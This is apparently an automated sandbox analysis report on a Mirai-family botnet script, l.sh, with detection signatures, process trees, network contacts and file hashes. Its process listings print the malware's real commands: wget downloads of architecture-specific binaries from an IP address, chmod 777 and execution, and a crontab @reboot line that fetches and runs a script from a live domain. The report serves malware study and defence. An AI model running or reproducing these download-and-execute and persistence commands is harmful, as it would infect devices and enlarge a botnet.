Malware Analysis Report

2024-11-13 18:02

Sample ID 241109-klez1s1fmf
Target l.sh
SHA256 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
Tags
mirai botnet botnet defense_evasion discovery execution persistence privilege_escalatio
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd

Threat Level: Known bad

The file l.sh was found to be: Known bad.

Malicious Activity Summary

mirai botnet botnet defense_evasion discovery execution persistence privilege_escalatio

Mirai family

Mirai

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Renames itself

Executes dropped EXE

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 08:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

138s

Max time network

146s

Command Line

[/tmp/l.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 5.161.109.23 N/A N/A
Destination IP 202.61.197.122 N/A N/A
Destination IP 64.176.6.48 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.kwgToV /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.jeG6xK /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.k7lYiR /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [kswapd0] /tmp/lib/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself mini_httpd /mnt/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself [kswapd0] /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1017/exe]

/bin/ls

[ls -l /proc/1022/exe]

/bin/ls

[ls -l /proc/1036/exe]

/bin/ls

[ls -l /proc/1042/exe]

/bin/ls

[ls -l /proc/1056/exe]

/bin/ls

[ls -l /proc/1060/exe]

/bin/ls

[ls -l /proc/1063/exe]

/bin/ls

[ls -l /proc/1066/exe]

/bin/ls

[ls -l /proc/1070/exe]

/bin/ls

[ls -l /proc/1080/exe]

/bin/ls

[ls -l /proc/1084/exe]

/bin/ls

[ls -l /proc/1093/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1108/exe]

/bin/ls

[ls -l /proc/1113/exe]

/bin/ls

[ls -l /proc/1117/exe]

/bin/ls

[ls -l /proc/1121/exe]

/bin/ls

[ls -l /proc/1125/exe]

/bin/ls

[ls -l /proc/1129/exe]

/bin/ls

[ls -l /proc/1133/exe]

/bin/ls

[ls -l /proc/1138/exe]

/bin/ls

[ls -l /proc/1142/exe]

/bin/ls

[ls -l /proc/1143/exe]

/bin/ls

[ls -l /proc/1146/exe]

/bin/ls

[ls -l /proc/1149/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/1151/exe]

/bin/ls

[ls -l /proc/1161/exe]

/bin/ls

[ls -l /proc/1163/exe]

/bin/ls

[ls -l /proc/1165/exe]

/bin/ls

[ls -l /proc/1166/exe]

/bin/ls

[ls -l /proc/1171/exe]

/bin/ls

[ls -l /proc/1179/exe]

/bin/ls

[ls -l /proc/1182/exe]

/bin/ls

[ls -l /proc/1183/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1185/exe]

/bin/ls

[ls -l /proc/1188/exe]

/bin/ls

[ls -l /proc/1191/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1226/exe]

/bin/ls

[ls -l /proc/1228/exe]

/bin/ls

[ls -l /proc/1255/exe]

/bin/ls

[ls -l /proc/1256/exe]

/bin/ls

[ls -l /proc/1269/exe]

/bin/ls

[ls -l /proc/1282/exe]

/bin/ls

[ls -l /proc/1287/exe]

/bin/ls

[ls -l /proc/1297/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/1308/exe]

/bin/ls

[ls -l /proc/1313/exe]

/bin/ls

[ls -l /proc/1317/exe]

/bin/ls

[ls -l /proc/1339/exe]

/bin/ls

[ls -l /proc/1349/exe]

/bin/ls

[ls -l /proc/137/exe]

/bin/ls

[ls -l /proc/1379/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1478/exe]

/bin/ls

[ls -l /proc/1497/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/1503/exe]

/bin/ls

[ls -l /proc/1505/exe]

/bin/ls

[ls -l /proc/1506/exe]

/bin/ls

[ls -l /proc/1507/exe]

/bin/ls

[ls -l /proc/1509/exe]

/bin/ls

[ls -l /proc/159/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/160/exe]

/bin/ls

[ls -l /proc/161/exe]

/bin/ls

[ls -l /proc/162/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/203/exe]

/bin/ls

[ls -l /proc/204/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/244/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/269/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/309/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/313/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/405/exe]

/bin/ls

[ls -l /proc/412/exe]

/bin/ls

[ls -l /proc/436/exe]

/bin/ls

[ls -l /proc/443/exe]

/bin/ls

[ls -l /proc/454/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/463/exe]

/bin/ls

[ls -l /proc/466/exe]

/bin/ls

[ls -l /proc/472/exe]

/bin/ls

[ls -l /proc/473/exe]

/bin/ls

[ls -l /proc/474/exe]

/bin/ls

[ls -l /proc/476/exe]

/bin/ls

[ls -l /proc/480/exe]

/bin/ls

[ls -l /proc/484/exe]

/bin/ls

[ls -l /proc/485/exe]

/bin/ls

[ls -l /proc/487/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/516/exe]

/bin/ls

[ls -l /proc/523/exe]

/bin/ls

[ls -l /proc/535/exe]

/bin/ls

[ls -l /proc/542/exe]

/bin/ls

[ls -l /proc/552/exe]

/bin/ls

[ls -l /proc/573/exe]

/bin/ls

[ls -l /proc/597/exe]

/bin/ls

[ls -l /proc/598/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/634/exe]

/bin/ls

[ls -l /proc/648/exe]

/bin/ls

[ls -l /proc/649/exe]

/bin/ls

[ls -l /proc/651/exe]

/bin/ls

[ls -l /proc/658/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/697/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/744/exe]

/bin/ls

[ls -l /proc/757/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/895/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/949/exe]

/bin/ls

[ls -l /proc/950/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/ls

[ls -l /proc/985/exe]

/bin/ls

[ls -l /proc/990/exe]

/bin/ls

[ls -l /proc/993/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.129.91:443 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 89.187.167.38:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
UA 45.202.35.91:80 45.202.35.91 tcp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
US 5.161.109.23:53 kingstonwikkerink.dyn udp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
CL 64.176.6.48:53 kingstonwikkerink.dyn udp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
DE 202.61.197.122:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:14781 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/tmp/lib/dvrLocker

MD5 f812a7b3a877f717eb6e54b843b41848
SHA1 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA256 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512 c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

/tmp/lib/dvrLocker

MD5 a016f79253a036ed87dd3ae118767cf2
SHA1 52c10912a82115af3a6dca21993c223a6e7c669d
SHA256 95f180a725b479687bdb9818991a68be75f0ba901c969cc93746e9996c1d0e50
SHA512 516191548c77eca021d07886a811f2fa6fc4be4f0321d5d61c1452cb22606877349a2dc80b03725f6e18fc0ce2524b0040baa6bdbabb40e9342da4401aa6e509

/tmp/lib/dvrLocker

MD5 78c772ea162b97132c3b76f6c313d326
SHA1 d45f7fc473e9e47185541bff467721386245e8e6
SHA256 a621a97a08419ab7d35eecb70ae4a9f8849f621101821ca84df3886252ace701
SHA512 fde9dc70c6cc6fa518a81cf52fe4bcba66c54afeb8986644dfa700bc1c9766f3d51160ebc7b2eb98c50c99a26b3caea541783b59d1bb208d8746f96121a70a00

/var/spool/cron/crontabs/tmp.jeG6xK

MD5 50615ad6e26d96511b53202a444c5adf
SHA1 5bd5689ac12e87808368ca533ac37de5e87a5572
SHA256 9d9de6a1533d670579c5ef30d6ec10792da69ea28cf2db0589549668ee5b5e5b
SHA512 815b123082890500949a2d90d67e9d202f02a03b112aedb71ca28efcf92d6e28b8ce49034f3111cf8e5eeb3296f381911be3835538f3928ead826af632400741

/mnt/dvrLocker

MD5 b1a1559b205459098f1fff627d35c808
SHA1 983f62052375084a8c125353e0c25b7cd19bd369
SHA256 e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA512 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d

/var/spool/cron/crontabs/tmp.k7lYiR

MD5 9ed1c2ba0b84e3f738ead207c7035a35
SHA1 493f92e391ccf01c25c53e11a1b793240e79f5f6
SHA256 04195b12cd1400e8252bead74661e3384632a0bbcea5d8c52f8e0635bdc3919d
SHA512 705d28611e2f551e51df9e60b99c189244c4798674b9d114fbf3072a30418c8783bd1a7ee0991439e8b02ec9480d3848840299151bb2b86f328a7c08a08e12bc

/var/spool/cron/crontabs/tmp.kwgToV

MD5 fa18d8ddc32b949074f8e5955ee746e0
SHA1 66bf6733f867d38bf1506f2fcf730444c6eacee2
SHA256 52c9e4b1a2d1ca0b4de5f5f4cce9aa98ec17b37a49ed2fc1842bb78937765dc9
SHA512 a6a8017f1050d8f03eea7cf66522c39d64661c4d44c1642317c8ebf20d20c7d8e9f47e45bf01d512323195150cbee0dc3dd8da4bf90735b273a64eddaebc85ac

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 152.53.15.127 N/A N/A
Destination IP 168.235.111.72 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.x2KALa /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself mini_httpd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/834/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
